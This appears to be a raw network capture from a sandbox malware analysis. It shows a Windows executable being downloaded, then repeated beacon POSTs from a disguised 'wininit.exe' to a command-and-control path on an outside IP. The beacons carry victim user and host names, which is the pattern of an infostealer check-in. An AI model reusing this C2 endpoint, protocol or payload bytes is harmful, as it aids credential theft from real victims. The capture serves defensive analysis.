Nov 20, 2024 10:11:25.038772106 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:11:24 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Wed, 20 Nov 2024 01:27:09 GMT ETag: "92a00-6274e0c657f44" Accept-Ranges: bytes Content-Length: 600576 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 3a 3d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 09 00 00 20 00 00 00 00 00 00 e6 26 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 26 09 00 4f 00 00 00 00 40 09 00 7c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL:=g0 & @@ `&O@\|` H.text `.rsrc\|@@@.reloc`(@B&H6(^(}{rp o5{o7&0{o9}&0to{{rp(o:+%{oo;o&Xi2{o<&{o=+E\b2{oAn(}}(*0
Nov 20, 2024 10:11:25.038808107 CET	224	IN	Data Raw: 00 be 00 00 00 03 00 00 11 02 7b 07 00 00 04 6f 1a 00 00 0a 17 8d 33 00 00 01 25 16 1f 3b 9d 6f 1b 00 00 0a 0a 02 7b 09 00 00 04 6f 1a 00 00 0a 0b 73 1c 00 00 0a 0c 02 7b 03 00 00 04 06 07 08 6f 03 00 00 06 2c 69 72 35 00 00 70 0d 08 6f 1d 00 00 Data Ascii: {o3%;o{os{o,ir5po+(r5p(( -o!r9p(("&{o#{o#+rap("&&(*L$p.
Nov 20, 2024 10:11:25.038819075 CET	1236	IN	Data Raw: 09 19 00 00 01 1b 30 01 00 23 00 00 00 00 00 00 00 02 7b 03 00 00 04 6f 04 00 00 06 de 15 26 de 12 02 7b 04 00 00 04 6f 24 00 00 0a 02 28 25 00 00 0a dc 2a 00 01 1c 00 00 00 00 00 00 0d 0d 00 03 19 00 00 01 02 00 00 00 10 10 00 12 00 00 00 00 13 Data Ascii: 0#{o&{o$(%0H{orpo&,${orpo&,{o'{o'0{o&vrp("&{o$(%*
Nov 20, 2024 10:11:25.038830996 CET	1236	IN	Data Raw: 0a 02 28 42 00 00 0a 02 7b 08 00 00 04 6f 43 00 00 0a 02 28 42 00 00 0a 02 7b 07 00 00 04 6f 43 00 00 0a 02 28 42 00 00 0a 02 7b 06 00 00 04 6f 43 00 00 0a 02 06 72 e3 01 00 70 6f 44 00 00 0a 74 43 00 00 01 28 45 00 00 0a 02 1e 1d 1e 1d 73 32 00 Data Ascii: (B{oC(B{oC(B{oCrpoDtC(Es2(Frp(4rpo8sG(H(I(Jrp}r#p}((0s#s}{ooK>{oo
Nov 20, 2024 10:11:25.038844109 CET	1236	IN	Data Raw: 06 95 58 20 ff 00 00 00 5f 13 0b 11 0b 1f 7b 61 20 ff 00 00 00 5f 20 c8 01 00 00 58 20 00 01 00 00 5e 25 11 0b 61 1f 0f 5f 13 0c 11 0c 19 33 07 11 0c 11 09 61 13 0c 26 09 11 08 07 11 08 91 11 04 11 0b 95 61 d2 9c 11 0c 11 0a 5a 11 08 58 20 00 01 Data Ascii: X _{a _ X ^%a_3a&aZX ]aXi?.J()rpoDu1 %(RuJoSoT()oUrp%N%1%{%{%
Nov 20, 2024 10:11:25.038856983 CET	1236	IN	Data Raw: 18 00 00 04 2a 1b 30 06 00 d4 00 00 00 0a 00 00 11 02 7b 1d 00 00 04 2c 10 02 7b 19 00 00 04 6f 67 00 00 0a 3a bb 00 00 00 02 05 7d 1e 00 00 04 02 73 68 00 00 0a 7d 19 00 00 04 02 7b 19 00 00 04 03 04 6f 69 00 00 0a 02 02 7b 19 00 00 04 6f 6a 00 Data Ascii: 0{,{og:}sh}{oi{oj},+{sk}{ol{}+{}}(41%rp(1-}{omsBz}&}*
Nov 20, 2024 10:11:25.038949013 CET	1236	IN	Data Raw: 00 0e 00 00 11 02 7b 1d 00 00 04 2c 46 03 72 d9 05 00 70 6f 7b 00 00 0a 2d 0d 03 72 d9 05 00 70 28 16 00 00 0a 10 01 28 7c 00 00 0a 03 6f 51 00 00 0a 0a 02 7b 1a 00 00 04 06 16 06 8e 69 6f 7d 00 00 0a 02 7b 1a 00 00 04 6f 7e 00 00 0a de 0e 26 fe Data Ascii: {,Frpo{-rp((\|oQ{io}{o~&rpsBz.K0L{,7s I{io&o&o&rYpsBz#<"(&(BSJB
Nov 20, 2024 10:11:25.039562941 CET	1236	IN	Data Raw: 02 63 02 01 00 6f 01 63 02 01 00 25 08 67 02 01 00 08 00 6b 02 11 00 4e 07 6f 02 11 00 76 02 74 02 11 00 8f 01 79 02 01 00 c5 0c 7d 02 01 00 13 07 82 02 01 00 e5 06 87 02 01 00 fe 06 8c 02 01 00 46 01 91 02 01 00 4e 00 91 02 50 20 00 00 00 00 86 Data Ascii: coc%gkNovty}FNP \!*i!!:p"^"#!@#^##
Nov 20, 2024 10:11:25.039577007 CET	776	IN	Data Raw: 00 01 00 43 08 00 00 01 00 85 00 00 00 01 00 78 09 10 10 01 00 d9 0c 00 00 01 00 cb 02 00 00 02 00 b0 0b 00 00 01 00 b0 0b 00 00 01 00 60 01 00 00 01 00 da 0b 00 00 02 00 10 0d 10 10 03 00 4f 00 00 00 01 00 3e 02 00 00 02 00 78 01 00 00 01 00 38 Data Ascii: Cx`O>x8Cxr$)19AIQYaiqyA
Nov 20, 2024 10:11:25.039587975 CET	1236	IN	Data Raw: 00 51 01 d4 02 06 00 b1 02 19 02 ca 01 41 02 44 00 3d 01 b9 02 a3 05 d3 01 89 01 0d 0c d9 01 71 01 b7 09 06 00 89 01 a6 0b e9 01 71 01 68 01 ee 01 81 00 b2 05 3f 00 c1 02 b7 09 10 00 c1 02 02 06 00 02 c9 02 ce 0b 7d 00 d1 02 fc 04 3f 00 89 01 46 Data Ascii: QAD=qqh?}?FA=YYY#A+1JJ)^.6.?.^.#g.+w.3w.;w.Cg.K}.Sw.[w.c.
Nov 20, 2024 10:11:25.045048952 CET	1236	IN	Data Raw: 72 63 65 43 75 6c 74 75 72 65 00 43 61 70 74 75 72 65 00 42 75 74 74 6f 6e 42 61 73 65 00 41 70 70 6c 69 63 61 74 69 6f 6e 53 65 74 74 69 6e 67 73 42 61 73 65 00 54 65 78 74 42 6f 78 42 61 73 65 00 43 68 65 63 6b 52 65 73 70 6f 6e 73 65 00 72 65 Data Ascii: rceCultureCaptureButtonBaseApplicationSettingsBaseTextBoxBaseCheckResponseresponseCloseDisposeAuthenticateEditorBrowsableStateProcessStateWriteSTAThreadAttributeCompilerGeneratedAttributeGuidAttributeGeneratedCodeAttributeDebu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49171	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:34.224472046 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 176 Connection: close
Nov 20, 2024 10:11:34.232361078 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus367706ALBUS-PCk0DE4229FCF97F5879F50F8FD3cEKF9
Nov 20, 2024 10:11:34.825088978 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49172	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:34.927901030 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 176 Connection: close
Nov 20, 2024 10:11:34.936985970 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus367706ALBUS-PC+0DE4229FCF97F5879F50F8FD3dF5bH
Nov 20, 2024 10:11:35.688764095 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49173	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:35.748172045 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:35.753276110 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:36.639029026 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49174	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:36.782336950 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:36.788419962 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:37.678376913 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49175	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:37.858225107 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:37.865230083 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:38.715972900 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49176	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:39.929833889 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:39.935431004 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:40.657332897 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.22	49177	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:40.798015118 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:40.804852962 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:41.542538881 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.22	49178	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:41.684906006 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:41.692874908 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:42.435044050 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.22	49179	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:42.587925911 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:42.598310947 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:43.356853008 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.22	49180	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:43.503565073 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:43.508450985 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:44.250286102 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.22	49181	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:44.400038004 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:44.410226107 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:45.152724028 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.22	49182	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:46.061436892 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:46.066976070 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:46.807615995 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.22	49183	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:47.086957932 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:47.094305992 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:47.853576899 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.22	49184	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:47.996814013 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:48.001930952 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:48.762204885 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.22	49185	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:48.908246040 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:48.916450024 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:11:49.780787945 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:11:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.22	49186	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:49.927817106 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:11:49.934221029 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
